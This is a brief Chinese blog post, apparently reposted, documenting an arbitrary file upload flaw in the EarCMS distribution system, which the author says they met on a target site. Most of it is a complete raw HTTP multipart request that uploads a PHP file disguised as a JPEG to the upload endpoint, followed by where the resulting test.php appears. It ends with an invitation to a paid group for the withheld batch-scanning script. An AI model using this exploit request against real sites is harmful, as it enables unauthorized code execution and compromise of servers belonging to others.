很久之前就研究过这个洞 到现在都忘了 今天在目标站遇见了就记录下来吧
Payload:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
| POST /source/pack/upload/index-uplog.php HTTP/1.1 Host: 127.0.0.1 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZWa8hDK6XlSEJhi7 Accept: */* Accept-Language: zh-CN,zh;q=0.9 Content-Length: 322
------WebKitFormBoundaryZWa8hDK6XlSEJhi7 Content-Disposition: form-data; name="app"; filename="funny.php" Content-Type: image/jpeg
<?php phpinfo();;unlink(__FILE__);?> ------WebKitFormBoundaryZWa8hDK6XlSEJhi7 Content-Disposition: form-data; name="time"
test //这是文件名 ------WebKitFormBoundaryZWa8hDK6XlSEJhi7--
|
go后会在 /data/tmp/
下生成 test.php
文件
批量脚本就不放了 有兴趣可以一起进星球交流
扫一扫,加入信安圈。
文章来源: https://www.safeinfo.me/2020/06/26/earcms%E5%88%86%E5%8F%91%E7%B3%BB%E7%BB%9F%E4%BB%BB%E6%84%8F%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html
如有侵权请联系:admin#unsafe.sh